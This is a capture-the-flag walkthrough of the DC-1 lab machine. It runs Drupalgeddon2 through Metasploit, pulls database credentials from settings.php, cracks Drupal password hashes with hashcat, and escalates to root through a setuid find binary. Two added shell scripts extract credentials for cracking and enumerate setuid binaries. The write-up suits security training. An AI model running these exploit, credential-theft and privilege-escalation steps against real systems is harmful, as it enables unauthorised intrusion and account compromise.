
DC-1 Mukesh

The document outlines a step-by-step process for exploiting a target system running Drupal CMS using tools like NMAP and Metasploit. It details the discovery of open ports, gaining access through a reverse shell, and retrieving five flags by navigating through directories and databases. The final steps involve obtaining root permissions to access the last flag in the root directory.

Uploaded by

Suraj Kumar

Step 1: Let's start by finding the IP:

We use netdiscover, which sweeps the local network with ARP requests and lists the hosts that answer, to spot the VM.

Target IP: 192.168.0.109

Step 2: Scan our target:

We run an nmap scan with service and version detection against the target.

The nmap output shows three open ports: 22 (SSH), 80 (HTTP), 111 (rpcbind/RPC).

Port 80 is serving HTTP, so we open the IP in a browser.

The web application identifies itself as Drupal CMS. Since the target runs Drupal, we check whether it is vulnerable to Drupalgeddon2 (CVE-2018-7600, unauthenticated remote code execution affecting Drupal 7 before 7.58 and Drupal 8 before 8.5.1). We run the exploit against the target from Metasploit and get a reverse shell.

Step 3: Gaining access:

Using Metasploit (msfconsole):

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.0.109
exploit

We get a Meterpreter session on the target.

And we got our 1st flag.

We have to find 4 more flags to complete the machine, so let's do it.

Let's open flag1.txt to get the hint for flag 2.


The hint tells us to look for a config file, but here's the catch: what we need is Drupal's settings file, not something literally named "config" :)

Open the sites directory,

then open the default directory,

and there is the settings.php file.

settings.php gives us flag 2, and it also holds the database credentials Drupal uses (the database user dbuser and the database drupaldb).

For flag 3 we will use these credentials to access the MySQL database.

To do that we first turn the Meterpreter session into an interactive shell: drop to the system shell from Meterpreter, then spawn a proper pty with Python (the mysql client needs a terminal to prompt for the password):

python -c 'import pty; pty.spawn("/bin/bash")'

Now we have an interactive shell :)

Now we access the database:

mysql -u dbuser -p
(-u = username; -p makes the client prompt for the password we took from settings.php)

Inside the mysql client:

show databases;

use drupaldb;

show tables;

Look for the users table, then dump it; the pass column holds the password hashes:

select * from users;

Drupal is also known for strong password hashes (Drupal 7 stores salted, iterated SHA-512 hashes with the $S$ prefix). Are they secure enough? I let my 1070 Ti GPU decide: I downloaded hashcat to my Windows PC together with the rockyou.txt wordlist (hashcat mode 7900 handles Drupal 7 hashes).

I didn't have to wait long for the admin's password: 53cr3t. I logged in to the Drupal site as admin and found the third flag under the Content menu.
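Pulling the database credentials out of settings.php (the flag 2 step) and turning the users table into something hashcat accepts (the flag 3 step), as an added example that is not the walkthrough's own code. The settings.php excerpt, the password value, the "Fred" account and the hash strings are constructed for the demo; dbuser, drupaldb and admin come from the text above.

```shell
#!/bin/sh
# Added example, not from the walkthrough: read the DB credentials out of
# sites/default/settings.php, pick the hashcat mode for the stored hashes, and turn
# the users rows into name:hash lines. The settings.php excerpt, the password value,
# the "Fred" account and the hash strings are constructed for this demo.

# Constructed Drupal 7 $databases array, in the shape settings.php uses.
SETTINGS_SAMPLE="\$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'constructed-db-password',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);"

# Print one quoted field (database, username, password, host) from settings.php on stdin.
drupal_db_field() {
  sed -n "s/^[[:space:]]*'$1'[[:space:]]*=>[[:space:]]*'\([^']*\)'.*/\1/p" | head -n 1
}

# Constructed output of: mysql -B -u dbuser -p -e 'select name, pass from users' drupaldb
# Tab-separated: header row, Drupal's anonymous uid 0 row (empty name and pass), two accounts.
# The hash bodies are placeholders carrying only the real $S$ prefix, not real hashes.
USERS_SAMPLE=$(printf 'name\tpass\n\t\nadmin\t$S$DconstructedHashForAdmin\nFred\t$S$DconstructedHashForFred\n')

# hashcat mode for a stored hash: Drupal 7 writes salted, iterated SHA-512 with the $S$
# prefix (mode 7900); $P$/$H$ is generic phpass (mode 400); anything else needs a closer look.
hashcat_mode() {
  case "$1" in
    '$S$'*)        printf '7900\n' ;;
    '$P$'*|'$H$'*) printf '400\n' ;;
    *)             printf 'unknown\n' ;;
  esac
}

# name:hash lines for `hashcat --username -m 7900 hashes.txt rockyou.txt`, skipping the
# header, the anonymous row and any account without a password hash.
users_to_hashcat() {
  awk -F "$(printf '\t')" 'NR > 1 && $1 != "" && $2 != "" { print $1 ":" $2 }'
}

printf '%s\n' "$SETTINGS_SAMPLE" | drupal_db_field username
printf '%s\n' "$USERS_SAMPLE" | users_to_hashcat
```

On the real box the users rows come from `mysql -B`, and the resulting file goes to hashcat with `--username` so each cracked hash is reported next to its account name; the anonymous uid 0 row that `select * from users` always returns has no hash and is dropped rather than fed to the cracker.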
For flag 4 we have to go to the home directory.

From the Drupal tree, cd .. (four times) brings us back to /; from there, go into home.

And we got our flag 4 :) . From its hint, it seems we have to check the root directory (/root) for flag 5.

To read /root we need root privileges.

We get them with this command:

find . -exec /bin/sh \; -quit

This works because find on this target is a setuid-root binary: the /bin/sh it spawns runs with an effective uid of 0, and -quit stops find after the first match so only one shell is spawned.

To check whether we got root, type whoami.

We got it :)

Now, at last, go to /root and read FLAG5. And it's done: the 5th flag was the final flag.
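A check to run before trusting the find one-liner, as an added example that is not part of the walkthrough: it lists setuid files under a path with their owner (only root-owned ones are useful), tests a single file for the bit, and picks the right find payload for whatever the target's /bin/sh actually is. The scratch directory and the fakebin file are constructed for the self-check; nothing here is DC-1's own code.

```shell
#!/bin/sh
# Added example, not from the walkthrough: verify why `find . -exec /bin/sh \; -quit`
# gives root before relying on it. It works on DC-1 because find carries the setuid
# bit and is owned by root; the same one-liner does nothing on a box where find is a
# normal binary.

# List setuid files under a directory, one "path owner" pair per line.
# Only root-owned entries matter for privilege escalation.
enumerate_suid() {
  find "$1" -perm -4000 -type f 2>/dev/null | while IFS= read -r f; do
    owner=$(ls -ld "$f" | awk '{ print $3 }')
    printf '%s %s\n' "$f" "$owner"
  done
}

# Does a single path carry the setuid bit? (POSIX test -u)
is_setuid() { [ -u "$1" ]; }

# Command to spawn a shell from a setuid find. dash (Debian's /bin/sh, which is
# DC-1's case) keeps the inherited effective uid, but bash drops it unless started
# with -p, so choose the invocation by what /bin/sh resolves to on the target.
suid_find_payload() {
  case "$1" in
    bash) printf '%s\n' 'find . -exec /bin/bash -p \; -quit' ;;
    *)    printf '%s\n' 'find . -exec /bin/sh \; -quit' ;;
  esac
}

# The "whoami" check from the walkthrough, as an exit status on the effective uid.
euid_is_root() { [ "$(id -u)" -eq 0 ]; }

# Self-check on a scratch directory: a constructed file we can set the bit on ourselves.
demo() {
  d=$(mktemp -d)
  : > "$d/fakebin"
  chmod u+s "$d/fakebin"
  enumerate_suid "$d"
  rm -rf "$d"
}
demo
```

On the target the call is `enumerate_suid /`; find should appear in the list owned by root, and `readlink -f /bin/sh` tells you which payload to use. A setuid binary owned by an ordinary user only gets you that user, which is why the owner column is printed.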
